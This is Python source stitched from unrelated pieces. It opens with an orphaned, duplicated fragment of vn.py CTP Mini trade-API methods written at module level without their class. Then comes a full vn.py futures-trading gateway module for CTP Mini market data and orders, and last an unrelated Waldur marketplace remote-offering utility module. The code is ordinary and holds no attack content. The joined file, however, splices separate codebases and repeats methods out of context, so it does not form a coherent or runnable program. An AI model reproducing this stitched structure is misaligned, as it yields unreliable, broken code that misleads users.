        tradeid=data["TradeID"],
        direction=DIRECTION_MINI2VT[data["Direction"]],
        offset=OFFSET_MINI2VT[data["OffsetFlag"]],
        price=data["Price"],
        volume=data["Volume"],
        time=data["TradeTime"],
        gateway_name=self.gateway_name
    )
    self.gateway.on_trade(trade)
def connect(
    self,
    address: str,
    userid: str,
    password: str,
    brokerid: int,
    auth_code: str,
    appid: str,
    product_info
):
    """
    Start connection to the trade server.

    On the first call the native FTDC trader API is created and
    initialised; on subsequent calls we go straight to authentication.
    """
    self.userid = userid
    self.password = password
    self.brokerid = brokerid
    self.auth_code = auth_code
    self.appid = appid
    self.product_info = product_info

    if self.connect_status:
        # API already created: just (re-)authenticate.
        self.authenticate()
        return

    flow_path = get_folder_path(self.gateway_name.lower())
    self.createFtdcTraderApi(str(flow_path) + "\\Td")
    self.subscribePrivateTopic(0)
    self.subscribePublicTopic(0)
    self.registerFront(address)
    self.init()
    self.connect_status = True
def authenticate(self):
    """Authenticate with the trade server using auth_code and appid."""
    request = dict(
        UserID=self.userid,
        BrokerID=self.brokerid,
        AuthCode=self.auth_code,
        AppID=self.appid,
    )
    if self.product_info:
        request["UserProductInfo"] = self.product_info

    self.reqid += 1
    self.reqAuthenticate(request, self.reqid)
def login(self):
    """
    Login onto the trade server.

    Does nothing after a previously failed login attempt.
    """
    if self.login_failed:
        return

    request = dict(
        UserID=self.userid,
        Password=self.password,
        BrokerID=self.brokerid,
        AppID=self.appid,
    )
    if self.product_info:
        request["UserProductInfo"] = self.product_info

    self.reqid += 1
    self.reqUserLogin(request, self.reqid)
def send_order(self, req: OrderRequest):
    """
    Send a new order to the trade server.

    Returns the vt_orderid of the locally created order object.
    """
    self.order_ref += 1

    mini_req = {
        "InstrumentID": req.symbol,
        "ExchangeID": req.exchange.value,
        "LimitPrice": req.price,
        "VolumeTotalOriginal": int(req.volume),
        "OrderPriceType": ORDERTYPE_VT2MINI.get(req.type, ""),
        "Direction": DIRECTION_VT2MINI.get(req.direction, ""),
        "CombOffsetFlag": OFFSET_VT2MINI.get(req.offset, ""),
        "OrderRef": str(self.order_ref),
        "InvestorID": self.userid,
        "UserID": self.userid,
        "BrokerID": self.brokerid,
        "CombHedgeFlag": THOST_FTDC_HF_Speculation,
        "ContingentCondition": THOST_FTDC_CC_Immediately,
        "ForceCloseReason": THOST_FTDC_FCC_NotForceClose,
        "IsAutoSuspend": 0,
        "TimeCondition": THOST_FTDC_TC_GFD,
        "VolumeCondition": THOST_FTDC_VC_AV,
        "MinVolume": 1
    }

    # FAK/FOK both map to a limit-price IOC order; they differ only in
    # the volume condition (any volume vs. complete volume).
    if req.type in (OrderType.FAK, OrderType.FOK):
        mini_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
        mini_req["TimeCondition"] = THOST_FTDC_TC_IOC
        mini_req["VolumeCondition"] = (
            THOST_FTDC_VC_AV if req.type == OrderType.FAK else THOST_FTDC_VC_CV
        )

    self.reqid += 1
    self.reqOrderInsert(mini_req, self.reqid)

    orderid = f"{self.frontid}_{self.sessionid}_{self.order_ref}"
    order = req.create_order_data(orderid, self.gateway_name)
    self.gateway.on_order(order)

    return order.vt_orderid
def cancel_order(self, req: CancelRequest):
    """
    Cancel an existing order identified by its front/session/ref triple.
    """
    # The local orderid was built as "{frontid}_{sessionid}_{order_ref}".
    frontid, sessionid, order_ref = req.orderid.split("_")

    action_req = {
        "InstrumentID": req.symbol,
        "ExchangeID": req.exchange.value,
        "OrderRef": order_ref,
        "FrontID": int(frontid),
        "SessionID": int(sessionid),
        "ActionFlag": THOST_FTDC_AF_Delete,
        "BrokerID": self.brokerid,
        "InvestorID": self.userid
    }

    self.reqid += 1
    self.reqOrderAction(action_req, self.reqid)
def query_account(self):
    """
    Query account balance data.

    Results arrive asynchronously via onRspQryTradingAccount.
    """
    self.reqid += 1
    self.reqQryTradingAccount({}, self.reqid)
def query_position(self):
    """
    Query position holding data.

    Skipped until contract data has been loaded (the position callback
    needs the symbol/exchange map to build position objects).
    """
    if not symbol_exchange_map:
        return

    self.reqid += 1
    self.reqQryInvestorPosition(
        {"BrokerID": self.brokerid, "InvestorID": self.userid},
        self.reqid,
    )
def close(self):
    """Release the underlying native API if it was ever connected."""
    if not self.connect_status:
        return
    self.exit()
| """
"""
from datetime import datetime
from vnpy.api.mini import (
THOST_FTDC_OAS_Submitted,
THOST_FTDC_OAS_Accepted,
THOST_FTDC_OAS_Rejected,
THOST_FTDC_OST_NoTradeQueueing,
THOST_FTDC_OST_PartTradedQueueing,
THOST_FTDC_OST_AllTraded,
THOST_FTDC_OST_Canceled,
THOST_FTDC_D_Buy,
THOST_FTDC_D_Sell,
THOST_FTDC_PD_Long,
THOST_FTDC_PD_Short,
THOST_FTDC_OPT_LimitPrice,
THOST_FTDC_OPT_AnyPrice,
THOST_FTDC_OF_Open,
THOST_FTDC_OFEN_Close,
THOST_FTDC_OFEN_CloseYesterday,
THOST_FTDC_OFEN_CloseToday,
THOST_FTDC_PC_Futures,
THOST_FTDC_PC_Options,
THOST_FTDC_PC_Combination,
THOST_FTDC_CP_CallOptions,
THOST_FTDC_CP_PutOptions,
THOST_FTDC_HF_Speculation,
THOST_FTDC_CC_Immediately,
THOST_FTDC_FCC_NotForceClose,
THOST_FTDC_TC_GFD,
THOST_FTDC_VC_AV,
THOST_FTDC_TC_IOC,
THOST_FTDC_VC_CV,
THOST_FTDC_AF_Delete
)
from vnpy.trader.constant import (
Direction,
Offset,
Exchange,
OrderType,
Product,
Status,
OptionType
)
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
OrderRequest,
CancelRequest,
SubscribeRequest,
)
from vnpy.trader.utility import get_folder_path
from vnpy.trader.event import EVENT_TIMER
from .vnminimd import MdApi
from .vnminitd import TdApi
# Order status: CTP Mini -> vn.py
STATUS_MINI2VT = {
    THOST_FTDC_OAS_Submitted: Status.SUBMITTING,
    THOST_FTDC_OAS_Accepted: Status.SUBMITTING,
    THOST_FTDC_OAS_Rejected: Status.REJECTED,
    THOST_FTDC_OST_NoTradeQueueing: Status.NOTTRADED,
    THOST_FTDC_OST_PartTradedQueueing: Status.PARTTRADED,
    THOST_FTDC_OST_AllTraded: Status.ALLTRADED,
    THOST_FTDC_OST_Canceled: Status.CANCELLED
}

# Order direction: vn.py -> CTP Mini, plus the reverse map extended with
# position-direction codes so it can also decode position records.
DIRECTION_VT2MINI = {
    Direction.LONG: THOST_FTDC_D_Buy,
    Direction.SHORT: THOST_FTDC_D_Sell
}
DIRECTION_MINI2VT = {v: k for k, v in DIRECTION_VT2MINI.items()}
DIRECTION_MINI2VT[THOST_FTDC_PD_Long] = Direction.LONG
DIRECTION_MINI2VT[THOST_FTDC_PD_Short] = Direction.SHORT

# Order price type: vn.py <-> CTP Mini
ORDERTYPE_VT2MINI = {
    OrderType.LIMIT: THOST_FTDC_OPT_LimitPrice,
    OrderType.MARKET: THOST_FTDC_OPT_AnyPrice
}
ORDERTYPE_MINI2VT = {v: k for k, v in ORDERTYPE_VT2MINI.items()}

# Offset flag: vn.py <-> CTP Mini
OFFSET_VT2MINI = {
    Offset.OPEN: THOST_FTDC_OF_Open,
    Offset.CLOSE: THOST_FTDC_OFEN_Close,
    Offset.CLOSETODAY: THOST_FTDC_OFEN_CloseToday,
    Offset.CLOSEYESTERDAY: THOST_FTDC_OFEN_CloseYesterday,
}
OFFSET_MINI2VT = {v: k for k, v in OFFSET_VT2MINI.items()}

# Exchange code string -> vn.py Exchange enum
EXCHANGE_MINI2VT = {
    "CFFEX": Exchange.CFFEX,
    "SHFE": Exchange.SHFE,
    "CZCE": Exchange.CZCE,
    "DCE": Exchange.DCE,
    "INE": Exchange.INE
}

# Product class -> vn.py Product enum
PRODUCT_MINI2VT = {
    THOST_FTDC_PC_Futures: Product.FUTURES,
    THOST_FTDC_PC_Options: Product.OPTION,
    THOST_FTDC_PC_Combination: Product.SPREAD
}

# Option type -> vn.py OptionType enum
OPTIONTYPE_MINI2VT = {
    THOST_FTDC_CP_CallOptions: OptionType.CALL,
    THOST_FTDC_CP_PutOptions: OptionType.PUT
}

# Module-level contract caches, filled by the instrument query callback
# and shared between the Md and Td API wrappers.
symbol_exchange_map = {}
symbol_name_map = {}
symbol_size_map = {}
class MinitestGateway(BaseGateway):
    """
    VN Trader Gateway for CTP Mini.

    Wraps the CTP Mini trade (Td) and market-data (Md) native APIs and
    exposes them through the standard vn.py BaseGateway interface.
    """

    # Connection settings shown in the UI. Labels are in Chinese:
    # username, password, broker id, trade server, market-data server,
    # product name (AppID), auth code, product info.
    default_setting = {
        "用户名": "",
        "密码": "",
        "经纪商代码": "",
        "交易服务器": "",
        "行情服务器": "",
        "产品名称": "",
        "授权编码": "",
        "产品信息": ""
    }

    exchanges = list(EXCHANGE_MINI2VT.values())

    def __init__(self, event_engine):
        """Constructor"""
        super().__init__(event_engine, "MINITEST")

        self.td_api = MiniTdApi(self)
        self.md_api = MiniMdApi(self)

    def connect(self, setting: dict):
        """Connect both trade and market-data APIs using UI settings."""
        userid = setting["用户名"]
        password = setting["密码"]
        brokerid = setting["经纪商代码"]
        td_address = setting["交易服务器"]
        md_address = setting["行情服务器"]
        appid = setting["产品名称"]
        auth_code = setting["授权编码"]
        product_info = setting["产品信息"]

        # Normalise bare "host:port" addresses to tcp:// URLs.
        if not td_address.startswith("tcp://"):
            td_address = "tcp://" + td_address
        if not md_address.startswith("tcp://"):
            md_address = "tcp://" + md_address

        self.td_api.connect(td_address, userid, password,
                            brokerid, auth_code, appid, product_info)
        self.md_api.connect(md_address, userid, password, brokerid)

        self.init_query()

    def subscribe(self, req: SubscribeRequest):
        """Subscribe to tick data updates."""
        self.md_api.subscribe(req)

    def send_order(self, req: OrderRequest):
        """Send a new order; returns the vt_orderid."""
        return self.td_api.send_order(req)

    def cancel_order(self, req: CancelRequest):
        """Cancel an existing order."""
        self.td_api.cancel_order(req)

    def query_account(self):
        """Query account balance data."""
        self.td_api.query_account()

    def query_position(self):
        """Query position holding data."""
        self.td_api.query_position()

    def close(self):
        """Release both native APIs."""
        self.td_api.close()
        self.md_api.close()

    def write_error(self, msg: str, error: dict):
        """Log a CTP error dict together with a context message."""
        error_id = error["ErrorID"]
        error_msg = error["ErrorMsg"]
        msg = f"{msg},代码:{error_id},信息:{error_msg}"
        self.write_log(msg)

    def process_timer_event(self, event):
        """
        Timer handler: every second timer tick, run the next query
        function in round-robin order (account, position, account, ...).
        """
        self.count += 1
        if self.count < 2:
            return
        self.count = 0

        func = self.query_functions.pop(0)
        func()
        self.query_functions.append(func)

    def init_query(self):
        """Register the periodic account/position query cycle."""
        self.count = 0
        self.query_functions = [self.query_account, self.query_position]
        self.event_engine.register(EVENT_TIMER, self.process_timer_event)
class MiniMdApi(MdApi):
    """Market-data API wrapper for CTP Mini."""

    def __init__(self, gateway):
        """Constructor"""
        super(MiniMdApi, self).__init__()

        self.gateway = gateway
        self.gateway_name = gateway.gateway_name

        self.reqid = 0                 # monotonically increasing request id

        self.connect_status = False    # native API created/initialised
        self.login_status = False      # logged in to the md front
        self.subscribed = set()        # symbols to (re-)subscribe on login

        self.userid = ""
        self.password = ""
        self.brokerid = ""

    def onFrontConnected(self):
        """
        Callback when front server is connected.
        """
        self.gateway.write_log("行情服务器连接成功")
        self.login()

    def onFrontDisconnected(self, reason: int):
        """
        Callback when front server is disconnected.
        """
        self.login_status = False
        self.gateway.write_log(f"行情服务器连接断开,原因{reason}")

    def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
        """
        Callback when user is logged in.

        Re-subscribes every previously requested symbol so subscriptions
        survive reconnects.
        """
        if not error["ErrorID"]:
            self.login_status = True
            self.gateway.write_log("行情服务器登录成功")

            for symbol in self.subscribed:
                self.subscribeMarketData(symbol)
        else:
            self.gateway.write_error("行情服务器登录失败", error)

    def onRspError(self, error: dict, reqid: int, last: bool):
        """
        Callback when error occured.
        """
        self.gateway.write_error("行情接口报错", error)

    def onRspSubMarketData(self, data: dict, error: dict, reqid: int, last: bool):
        """Callback of market data subscription; only errors are reported."""
        if not error or not error["ErrorID"]:
            return

        self.gateway.write_error("行情订阅失败", error)

    def onRtnDepthMarketData(self, data: dict):
        """
        Callback of tick data update.

        Ticks for unknown symbols (contract data not yet loaded) are
        silently dropped.
        """
        symbol = data["InstrumentID"]
        exchange = symbol_exchange_map.get(symbol, "")
        if not exchange:
            return

        # Millisecond field is reduced to a single digit so the combined
        # string parses with the "%f" fractional-seconds directive.
        timestamp = f"{data['ActionDay']} {data['UpdateTime']}.{int(data['UpdateMillisec']/100)}"

        tick = TickData(
            symbol=symbol,
            exchange=exchange,
            datetime=datetime.strptime(timestamp, "%Y%m%d %H:%M:%S.%f"),
            name=symbol_name_map[symbol],
            volume=data["Volume"],
            open_interest=data["OpenInterest"],
            last_price=data["LastPrice"],
            limit_up=data["UpperLimitPrice"],
            limit_down=data["LowerLimitPrice"],
            open_price=data["OpenPrice"],
            high_price=data["HighestPrice"],
            low_price=data["LowestPrice"],
            pre_close=data["PreClosePrice"],
            bid_price_1=data["BidPrice1"],
            ask_price_1=data["AskPrice1"],
            bid_volume_1=data["BidVolume1"],
            ask_volume_1=data["AskVolume1"],
            gateway_name=self.gateway_name
        )

        # Fill 5-level depth only when the feed actually provides it.
        if data["BidPrice2"]:
            tick.bid_price_2 = data["BidPrice2"]
            tick.bid_price_3 = data["BidPrice3"]
            tick.bid_price_4 = data["BidPrice4"]
            tick.bid_price_5 = data["BidPrice5"]

            tick.ask_price_2 = data["AskPrice2"]
            tick.ask_price_3 = data["AskPrice3"]
            tick.ask_price_4 = data["AskPrice4"]
            tick.ask_price_5 = data["AskPrice5"]

            tick.bid_volume_2 = data["BidVolume2"]
            tick.bid_volume_3 = data["BidVolume3"]
            tick.bid_volume_4 = data["BidVolume4"]
            tick.bid_volume_5 = data["BidVolume5"]

            tick.ask_volume_2 = data["AskVolume2"]
            tick.ask_volume_3 = data["AskVolume3"]
            tick.ask_volume_4 = data["AskVolume4"]
            tick.ask_volume_5 = data["AskVolume5"]

        self.gateway.on_tick(tick)

    def connect(self, address: str, userid: str, password: str, brokerid: int):
        """
        Start connection to server.
        """
        self.userid = userid
        self.password = password
        self.brokerid = brokerid

        # If not connected, then start connection first.
        if not self.connect_status:
            path = get_folder_path(self.gateway_name.lower())
            self.createFtdcMdApi(str(path) + "\\Md")
            self.registerFront(address)
            self.init()
            self.connect_status = True
        # If already connected, then login immediately.
        elif not self.login_status:
            self.login()

    def login(self):
        """
        Login onto server.
        """
        req = {
            "UserID": self.userid,
            "Password": self.password,
            "BrokerID": self.brokerid
        }

        self.reqid += 1
        self.reqUserLogin(req, self.reqid)

    def subscribe(self, req: SubscribeRequest):
        """
        Subscribe to tick data update.

        The symbol is remembered so the subscription is restored after a
        reconnect even if we are not logged in right now.
        """
        if self.login_status:
            self.subscribeMarketData(req.symbol)
        self.subscribed.add(req.symbol)

    def close(self):
        """
        Close the connection.
        """
        if self.connect_status:
            self.exit()
class MiniTdApi(TdApi):
    """
    Trade API wrapper for CTP Mini.

    Handles authentication, login, order/trade callbacks and account,
    position and instrument queries.
    """

    def __init__(self, gateway):
        """Constructor"""
        super(MiniTdApi, self).__init__()

        self.gateway = gateway
        self.gateway_name = gateway.gateway_name

        self.reqid = 0        # monotonically increasing request id
        self.order_ref = 0    # per-session order reference counter

        self.connect_status = False
        self.login_status = False
        # NOTE(review): attribute name typo ("staus") kept for
        # backward compatibility — it may be read externally.
        self.auth_staus = False
        self.login_failed = False

        self.userid = ""
        self.password = ""
        self.brokerid = ""
        self.auth_code = ""
        self.appid = ""
        self.product_info = ""

        # Assigned by the login response; used to build local order ids.
        self.frontid = 0
        self.sessionid = 0

        # Buffers for callbacks that arrive before contract data loads.
        self.order_data = []
        self.trade_data = []

        self.positions = {}            # (symbol, direction) -> PositionData
        self.sysid_orderid_map = {}    # OrderSysID -> local orderid

    def onFrontConnected(self):
        """Callback when the trade front is connected."""
        self.gateway.write_log("交易服务器连接成功")

        if self.auth_code:
            self.authenticate()
        else:
            self.login()

    def onFrontDisconnected(self, reason: int):
        """Callback when the trade front is disconnected."""
        self.login_status = False
        self.gateway.write_log(f"交易服务器连接断开,原因{reason}")

    def onRspAuthenticate(self, data: dict, error: dict, reqid: int, last: bool):
        """Callback of the authentication request."""
        if not error['ErrorID']:
            self.auth_staus = True
            self.gateway.write_log("交易服务器授权验证成功")
            self.login()
        else:
            self.gateway.write_error("交易服务器授权验证失败", error)

    def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
        """Callback of the login request."""
        if not error["ErrorID"]:
            self.frontid = data["FrontID"]
            self.sessionid = data["SessionID"]
            self.login_status = True
            self.gateway.write_log("交易服务器登录成功")

            # Get instrument data directly without confirm settlement
            self.reqid += 1
            self.reqQryInstrument({}, self.reqid)
        else:
            self.login_failed = True
            self.gateway.write_error("交易服务器登录失败", error)

    def onRspOrderInsert(self, data: dict, error: dict, reqid: int, last: bool):
        """Callback when an order insert request is rejected."""
        order_ref = data["OrderRef"]
        orderid = f"{self.frontid}_{self.sessionid}_{order_ref}"

        symbol = data["InstrumentID"]
        exchange = symbol_exchange_map[symbol]

        order = OrderData(
            symbol=symbol,
            exchange=exchange,
            orderid=orderid,
            direction=DIRECTION_MINI2VT[data["Direction"]],
            offset=OFFSET_MINI2VT.get(data["CombOffsetFlag"], Offset.NONE),
            price=data["LimitPrice"],
            volume=data["VolumeTotalOriginal"],
            status=Status.REJECTED,
            gateway_name=self.gateway_name
        )
        self.gateway.on_order(order)

        self.gateway.write_error("交易委托失败", error)

    def onRspOrderAction(self, data: dict, error: dict, reqid: int, last: bool):
        """Callback when an order cancel request fails."""
        self.gateway.write_error("交易撤单失败", error)

    def onRspQueryMaxOrderVolume(self, data: dict, error: dict, reqid: int, last: bool):
        """Not used."""
        pass

    def onRspSettlementInfoConfirm(self, data: dict, error: dict, reqid: int, last: bool):
        """
        Callback of settlment info confimation. Not used.
        """
        pass

    def onRspQryInvestorPosition(self, data: dict, error: dict, reqid: int, last: bool):
        """
        Callback of position query.

        Long/short legs of the same symbol arrive as separate records and
        may be split across multiple rows; they are aggregated in
        ``self.positions`` and flushed to the gateway on the last record.
        """
        if data and data["InstrumentID"] in symbol_exchange_map:
            # Get buffered position object
            key = f"{data['InstrumentID'], data['PosiDirection']}"
            position = self.positions.get(key, None)
            if not position:
                position = PositionData(
                    symbol=data["InstrumentID"],
                    exchange=symbol_exchange_map[data["InstrumentID"]],
                    direction=DIRECTION_MINI2VT[data["PosiDirection"]],
                    gateway_name=self.gateway_name
                )
                self.positions[key] = position

            # For SHFE position data update
            if position.exchange == Exchange.SHFE:
                if data["YdPosition"] and not data["TodayPosition"]:
                    position.yd_volume = data["Position"]
            # For other exchange position data update
            else:
                position.yd_volume = data["Position"] - data["TodayPosition"]

            # Get contract size (spread contract has no size value)
            size = symbol_size_map.get(position.symbol, 0)

            # Calculate previous position cost
            cost = position.price * position.volume * size

            # Update new position volume
            position.volume += data["Position"]
            position.pnl += data["PositionProfit"]

            # Calculate average position price
            if position.volume and size:
                cost += data["PositionCost"]
                position.price = cost / (position.volume * size)

            # Get frozen volume
            if position.direction == Direction.LONG:
                position.frozen += data["ShortFrozen"]
            else:
                position.frozen += data["LongFrozen"]

        if last:
            for position in self.positions.values():
                self.gateway.on_position(position)
            self.positions.clear()

    def onRspQryTradingAccount(self, data: dict, error: dict, reqid: int, last: bool):
        """Callback of account balance query."""
        if "AccountID" not in data:
            return

        account = AccountData(
            accountid=data["AccountID"],
            balance=data["Balance"],
            frozen=data["FrozenMargin"] +
            data["FrozenCash"] + data["FrozenCommission"],
            gateway_name=self.gateway_name
        )
        account.available = data["Available"]
        self.gateway.on_account(account)

    def onRspQryInstrument(self, data: dict, error: dict, reqid: int, last: bool):
        """
        Callback of instrument query.
        """
        product = PRODUCT_MINI2VT.get(data.get("ProductClass", None), None)
        if product:
            contract = ContractData(
                symbol=data["InstrumentID"],
                exchange=EXCHANGE_MINI2VT[data["ExchangeID"]],
                name=data["InstrumentName"],
                product=product,
                size=data["VolumeMultiple"],
                pricetick=data["PriceTick"],
                gateway_name=self.gateway_name
            )

            # For option only
            if contract.product == Product.OPTION:
                # Fix: the original assignments ended with trailing
                # commas, which wrapped every value in a 1-element tuple.
                contract.option_underlying = data["UnderlyingInstrID"]
                contract.option_type = OPTIONTYPE_MINI2VT.get(data["OptionsType"], None)
                contract.option_strike = data["StrikePrice"]
                contract.option_expiry = datetime.strptime(data["ExpireDate"], "%Y%m%d")

            self.gateway.on_contract(contract)

            symbol_exchange_map[contract.symbol] = contract.exchange
            symbol_name_map[contract.symbol] = contract.name
            symbol_size_map[contract.symbol] = contract.size

        if last:
            self.gateway.write_log("合约信息查询成功")

            # Replay updates buffered while the contract table was unknown.
            for data in self.order_data:
                self.onRtnOrder(data)
            self.order_data.clear()

            for data in self.trade_data:
                self.onRtnTrade(data)
            self.trade_data.clear()

    def onRtnOrder(self, data: dict):
        """
        Callback of order status update.
        """
        symbol = data["InstrumentID"]
        exchange = symbol_exchange_map.get(symbol, "")
        if not exchange:
            # Contract not known yet: buffer for later replay.
            self.order_data.append(data)
            return

        frontid = data["FrontID"]
        sessionid = data["SessionID"]
        order_ref = data["OrderRef"]
        orderid = f"{frontid}_{sessionid}_{order_ref}"

        order = OrderData(
            symbol=symbol,
            exchange=exchange,
            orderid=orderid,
            type=ORDERTYPE_MINI2VT[data["OrderPriceType"]],
            direction=DIRECTION_MINI2VT[data["Direction"]],
            offset=OFFSET_MINI2VT[data["CombOffsetFlag"]],
            price=data["LimitPrice"],
            volume=data["VolumeTotalOriginal"],
            traded=data["VolumeTraded"],
            status=STATUS_MINI2VT[data["OrderStatus"]],
            time=data["InsertTime"],
            gateway_name=self.gateway_name
        )
        self.gateway.on_order(order)

        self.sysid_orderid_map[data["OrderSysID"]] = orderid

    def onRtnTrade(self, data: dict):
        """
        Callback of trade status update.
        """
        symbol = data["InstrumentID"]
        exchange = symbol_exchange_map.get(symbol, "")
        if not exchange:
            # Contract not known yet: buffer for later replay.
            self.trade_data.append(data)
            return

        orderid = self.sysid_orderid_map[data["OrderSysID"]]

        trade = TradeData(
            symbol=symbol,
            exchange=exchange,
            orderid=orderid,
            tradeid=data["TradeID"],
            direction=DIRECTION_MINI2VT[data["Direction"]],
            offset=OFFSET_MINI2VT[data["OffsetFlag"]],
            price=data["Price"],
            volume=data["Volume"],
            time=data["TradeTime"],
            gateway_name=self.gateway_name
        )
        self.gateway.on_trade(trade)

    def connect(
        self,
        address: str,
        userid: str,
        password: str,
        brokerid: int,
        auth_code: str,
        appid: str,
        product_info
    ):
        """
        Start connection to server.
        """
        self.userid = userid
        self.password = password
        self.brokerid = brokerid
        self.auth_code = auth_code
        self.appid = appid
        self.product_info = product_info

        if not self.connect_status:
            path = get_folder_path(self.gateway_name.lower())
            self.createFtdcTraderApi(str(path) + "\\Td")

            self.subscribePrivateTopic(0)
            self.subscribePublicTopic(0)

            self.registerFront(address)
            self.init()
            self.connect_status = True
        else:
            self.authenticate()

    def authenticate(self):
        """
        Authenticate with auth_code and appid.
        """
        req = {
            "UserID": self.userid,
            "BrokerID": self.brokerid,
            "AuthCode": self.auth_code,
            "AppID": self.appid
        }
        if self.product_info:
            req["UserProductInfo"] = self.product_info

        self.reqid += 1
        self.reqAuthenticate(req, self.reqid)

    def login(self):
        """
        Login onto server.
        """
        if self.login_failed:
            return

        req = {
            "UserID": self.userid,
            "Password": self.password,
            "BrokerID": self.brokerid,
            "AppID": self.appid
        }
        if self.product_info:
            req["UserProductInfo"] = self.product_info

        self.reqid += 1
        self.reqUserLogin(req, self.reqid)

    def send_order(self, req: OrderRequest):
        """
        Send new order; returns the vt_orderid of the local order object.
        """
        self.order_ref += 1

        mini_req = {
            "InstrumentID": req.symbol,
            "ExchangeID": req.exchange.value,
            "LimitPrice": req.price,
            "VolumeTotalOriginal": int(req.volume),
            "OrderPriceType": ORDERTYPE_VT2MINI.get(req.type, ""),
            "Direction": DIRECTION_VT2MINI.get(req.direction, ""),
            "CombOffsetFlag": OFFSET_VT2MINI.get(req.offset, ""),
            "OrderRef": str(self.order_ref),
            "InvestorID": self.userid,
            "UserID": self.userid,
            "BrokerID": self.brokerid,
            "CombHedgeFlag": THOST_FTDC_HF_Speculation,
            "ContingentCondition": THOST_FTDC_CC_Immediately,
            "ForceCloseReason": THOST_FTDC_FCC_NotForceClose,
            "IsAutoSuspend": 0,
            "TimeCondition": THOST_FTDC_TC_GFD,
            "VolumeCondition": THOST_FTDC_VC_AV,
            "MinVolume": 1
        }

        # FAK/FOK map to limit-price IOC orders differing only in the
        # volume condition (any volume vs. complete volume).
        if req.type == OrderType.FAK:
            mini_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
            mini_req["TimeCondition"] = THOST_FTDC_TC_IOC
            mini_req["VolumeCondition"] = THOST_FTDC_VC_AV
        elif req.type == OrderType.FOK:
            mini_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
            mini_req["TimeCondition"] = THOST_FTDC_TC_IOC
            mini_req["VolumeCondition"] = THOST_FTDC_VC_CV

        self.reqid += 1
        self.reqOrderInsert(mini_req, self.reqid)

        orderid = f"{self.frontid}_{self.sessionid}_{self.order_ref}"
        order = req.create_order_data(orderid, self.gateway_name)
        self.gateway.on_order(order)

        return order.vt_orderid

    def cancel_order(self, req: CancelRequest):
        """
        Cancel existing order.
        """
        frontid, sessionid, order_ref = req.orderid.split("_")

        mini_req = {
            "InstrumentID": req.symbol,
            "ExchangeID": req.exchange.value,
            "OrderRef": order_ref,
            "FrontID": int(frontid),
            "SessionID": int(sessionid),
            "ActionFlag": THOST_FTDC_AF_Delete,
            "BrokerID": self.brokerid,
            "InvestorID": self.userid
        }

        self.reqid += 1
        self.reqOrderAction(mini_req, self.reqid)

    def query_account(self):
        """
        Query account balance data.
        """
        self.reqid += 1
        self.reqQryTradingAccount({}, self.reqid)

    def query_position(self):
        """
        Query position holding data (skipped until contracts are loaded).
        """
        if not symbol_exchange_map:
            return

        req = {
            "BrokerID": self.brokerid,
            "InvestorID": self.userid
        }

        self.reqid += 1
        self.reqQryInvestorPosition(req, self.reqid)

    def close(self):
        """Release the underlying native API if it was ever connected."""
        if self.connect_status:
            self.exit()
|
import io
import logging
from collections import defaultdict
import requests
import urllib3
from django.utils import dateparse
from django.utils.dateparse import parse_datetime
from rest_framework.exceptions import ValidationError
from waldur_client import WaldurClient, WaldurClientException
from waldur_core.core.utils import get_system_robot
from waldur_core.structure import models as structure_models
from waldur_mastermind.marketplace import models as marketplace_models
from waldur_mastermind.marketplace_remote.constants import (
OFFERING_COMPONENT_FIELDS,
PLAN_FIELDS,
)
from . import PLUGIN_NAME
logger = logging.getLogger(__name__)

# Resource states to exclude when looking up "live" remote resources:
# not yet provisioned, or already terminated.
INVALID_RESOURCE_STATES = (
    marketplace_models.Resource.States.CREATING,
    marketplace_models.Resource.States.TERMINATED,
)
def get_client_for_offering(offering):
    """Construct a WaldurClient from the offering's secret options."""
    options = offering.secret_options
    return WaldurClient(options['api_url'], options['token'])
def get_project_backend_id(project):
    """Build the backend_id used to identify this project in remote Waldur."""
    return '{}_{}'.format(project.customer.uuid, project.uuid)
def pull_fields(fields, local_object, remote_object):
    """
    Copy differing field values from a remote representation onto a local
    model instance and persist them.

    Args:
        fields: iterable of field names to compare.
        local_object: object whose attributes may be updated and saved.
        remote_object: mapping holding the authoritative values.

    Returns:
        The set of field names that were updated.
    """
    changed_fields = {
        field
        for field in fields
        if remote_object[field] != getattr(local_object, field)
    }
    for field in changed_fields:
        setattr(local_object, field, remote_object[field])
    if changed_fields:
        local_object.save(update_fields=changed_fields)
    return changed_fields
def get_remote_offerings_for_project(project):
    """
    Return the queryset of active remote offerings that have at least one
    usable (non-creating, non-terminated) resource in the given project.
    """
    offering_ids = (
        marketplace_models.Resource.objects.filter(
            project=project,
            offering__type=PLUGIN_NAME,
            offering__state=marketplace_models.Offering.States.ACTIVE,
        )
        .exclude(state__in=INVALID_RESOURCE_STATES)
        .values_list('offering', flat=True)
        .distinct()
    )
    return marketplace_models.Offering.objects.filter(pk__in=offering_ids)
def get_projects_with_remote_offerings():
    """
    Collect all projects that either hold a usable remote resource or have
    a pending/executing order item for a remote offering.

    Returns:
        dict mapping Project -> set of remote Offerings used by it.
    """
    projects_with_offerings = defaultdict(set)

    resource_pairs = (
        marketplace_models.Resource.objects.filter(offering__type=PLUGIN_NAME)
        .exclude(state__in=INVALID_RESOURCE_STATES)
        .values('offering', 'project')
        .distinct()
    )
    for pair in resource_pairs:
        try:
            project = structure_models.Project.available_objects.get(pk=pair['project'])
        except structure_models.Project.DoesNotExist:
            # Fix: the original nested single quotes inside single-quoted
            # f-strings (a SyntaxError before Python 3.12); lazy %-style
            # logging arguments sidestep the issue and are the logging
            # best practice anyway.
            logger.debug(
                'Skipping resource from a removed project with PK %s',
                pair['project'],
            )
            continue
        offering = marketplace_models.Offering.objects.get(pk=pair['offering'])
        projects_with_offerings[project].add(offering)

    order_item_pairs = (
        marketplace_models.OrderItem.objects.filter(
            offering__type=PLUGIN_NAME,
            state__in=(
                marketplace_models.OrderItem.States.PENDING,
                marketplace_models.OrderItem.States.EXECUTING,
            ),
        )
        .values('offering', 'order__project')
        .distinct()
    )
    for pair in order_item_pairs:
        try:
            project = structure_models.Project.available_objects.get(
                pk=pair['order__project']
            )
        except structure_models.Project.DoesNotExist:
            logger.debug(
                'Skipping order item from a removed project with PK %s',
                pair['order__project'],
            )
            continue
        offering = marketplace_models.Offering.objects.get(pk=pair['offering'])
        projects_with_offerings[project].add(offering)

    return projects_with_offerings
